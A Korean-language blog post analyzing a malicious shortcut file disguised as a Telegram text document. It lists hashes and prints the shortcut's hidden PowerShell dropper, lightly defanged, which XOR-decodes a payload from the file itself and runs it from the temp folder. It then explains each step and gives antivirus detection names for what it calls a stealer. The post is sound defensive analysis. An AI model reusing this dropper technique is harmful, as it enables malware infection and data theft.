텔레그램을 사칭을 하는 정체 모를 APT-Telegram.txt.lnk(2024.11.27)

오늘은 텔레그램으로 속이는 정체 모를 APT-Telegram(.)txt(.)lnk(2024.11.27)에 대해 알아보겠습니다.
텔레그램은 2013년 8월 14일에 출시하고 개발 및 운영 중인 오픈 소스 모바일 메신저이며 러시아 태생의 니콜라이 두로프(Николай Дуров, Nikolai Durov),파벨 두로프 형제가 개발하여 2013년 8월에 iOS용으로 처음 출시 현재는 안드로이드·Windows, Windows Phone,리눅스,macOS,브라우저까지 지원하는 메신저이며 한때에는 카카오 톡 사찰 논란이 터지자 많은 사람이 사이버 망명을 하기도 했으면 해당 부분에서 긍정적인 부분보다 아마도 약쟁이, n번방 X착취물 제작 및 유포 사건, 2024년 텔레그램 딥페이크 음X물 유포 사건 이 대표적일 것입니다. 아무튼, 나쁜 쪽으로 많이 사용이 된 적이 많은 메신저이며 일단 정체를 알 수가 없지만 일단 Telegram(.)txt(.)lnk(2024.11.27)된 악성코드에 대해 간단하게 적어보겠습니다.
해쉬
파일명:Telegram(.)txt.lnk
사이즈:74,022 Bytes
MD5:dbf4819fd016c532db4313b9748ed879
SHA-1:a5f3818adc3eb97b658f62c1144cbd2add8d5528
SHA-256:2932dfc97050720a10f6b41f2c765d6200c64ed418a7058126965e827953323d

텔레그램 사칭 악성코드에 포함된 Powershell 코드

파워셀 에 포함된 코드

StringData
{
 namestring: Type: Text Document
 Size: 5.23 KB
 Date modified: 01/02/2020 11:23
 relativepath: not present
 workingdir: not present
 commandlinearguments:
 /c powershell -windowstyle hidden $ln(k)path = Get-C(h)ildItem *.lnk ^|
 where-obj(e)ct {$_.length -eq 0(x)00012126} ^| Select(-)Object -ExpandP
 roperty Na(m)e; $fil(e) = gc $lnk(p)ath -Enco(d)ing Byte; for($i=0; $i 
 -lt $fil(e).count; $i++) { $file([)$i] = $file[$i] -b(x)or 0x77 }; $pat
 h = '%te(m)p%\tmp' + (Get-Random) + '(.)exe'; sc $path ([byte[]]($file 
 ^| select -Skip (0)02838)) -Enco(d)ing Byte; ^& $path;
 iconlocation: %windir%\system32\notepad(.)exe
}

악성코드 분석

1.PowerShell 숨김 창 실행:Power Shell을 숨겨진 창에서 실행하여 사용자가 실행 사실을 인지하지 못하도록 하는 것이 목적
2. 특정 크기의 .lnk 파일 검색:.lnk 파일: 바로가기 파일을 검색
조건: 파일 크기가 0x00012126(약 74KB)
3.lnk 파일의 바이너리 데이터 읽기
gc`(Get-Content):.lnk 파일의 내용을 바이트 단위로 읽어들임
읽어들인 데이터는 $file 변수에 저장
4. XOR 연산을 통해 데이터 복호화
XOR 연산:
파일 데이터를 반복문을 통해 한 바이트씩 XOR(0x77) 연산 수행
XOR 복호화는 악성코드에서 데이터를 숨기기 위한 일반적인 기법
XOR 키(0x77): 악성 데이터가 암호화되어 있어 있으며 해당 키를 사용해 평문으로 변환
5. 임시 디렉터리에 실행 파일 생성
임시 파일 생성:
임시 폴더(%temp%)에 무작위 이름(tmpXXXXX.exe)의 실행 파일 생성
파일 자료는 .lnk 파일의 복호화된 자료에서 특정 부분(Skip 002838) 이후를 추출하여 저장
select -Skip 002838:데이터 앞부분(약 2.8KB)은 무시 나머지를 추출하여 실행 파일 작성
sc`(Set-Content):복호화된 데이터를 실행 파일로 저장
6. 생성된 실행 파일 실행**
생성된 악성 실행 파일을 바로 실행
감염된 시스템에서 악성코드가 실행되도록 유도
그러면 다음과 같은 파일 생성
파일명:tmp1709814677.exe
사이즈:71,184 Bytes
MD5:a7d234000c0f4fde1266602eebc0fc1c
SHA-1:df87c4c97e2280770a3e2571d99e53e65a45bee1
SHA-256:36b3792239bf1fd7da65ec73e1535228a1c56ed724be363afc5a9bf772280ecf
2024-11-27 05:58:30 UTC 기준으로 탐지하는 보안 업체들은 다음과 같습니다.
AhnLab-V3:LNK/Autorun.Gen
AliCloud:Trojan[dropper]:Win/WinLNK.DA8PHU
ALYac:Trojan.Agent.LNK.Gen
Arcabit:Heur.BZC.YAX.Pantera.203.6A973085 [many]
Avast:LNK:Dropper-D [Trj]
AVG:LNK:Dropper-D [Trj]
Avira (no cloud):LNK/Dropper.VPOO
BitDefender:Heur.BZC.YAX.Pantera.203.6A973085
CTX:Lnk.trojan.pantera
Cynet:Malicious (score: 99)
Emsisoft:Heur.BZC.YAX.Pantera.203.6A973085 (B)
eScan:Heur.BZC.YAX.Pantera.203.6A973085
ESET-NOD32:LNK/TrojanDropper.Agent.DD
Fortinet:LNK/Kimsuky.GOSU!tr
GData:Heur.BZC.YAX.Pantera.203.6A973085
Google:Detected
Huorong:HEUR:Trojan/LNK.Agent.b
Kaspersky:HEUR:Trojan.WinLNK.Powecod.c
Lionic:Trojan.WinLNK.Pantera.4!c
Microsoft:Trojan:Win32/WinLNK.DE!MTB
Rising:Trojan.PSRunner/LNK!1.BADE (CLASSIC)
SentinelOne (Static ML):Static AI - Suspicious LNK
Skyhigh (SWG):BehavesLike.Trojan.lg
Sophos:Troj/LnkObf-T
Symantec:Scr.Mallnk!gen13
Tencent:Win32.Trojan.Powecod.Ltgl
Trellix (ENS):LNK/Agent-FYF!DBF4819FD016
Trellix (HX):Heur.BZC.YAX.Pantera.203.6A973085
Varist:LNK/ABTrojan.LKWE-
VIPRE:Heur.BZC.YAX.Pantera.203.6A973085
WithSecure:Malware.LNK/Dropper.VPOO
쉽게 이야기하면 Stealer(스틸러)입니다.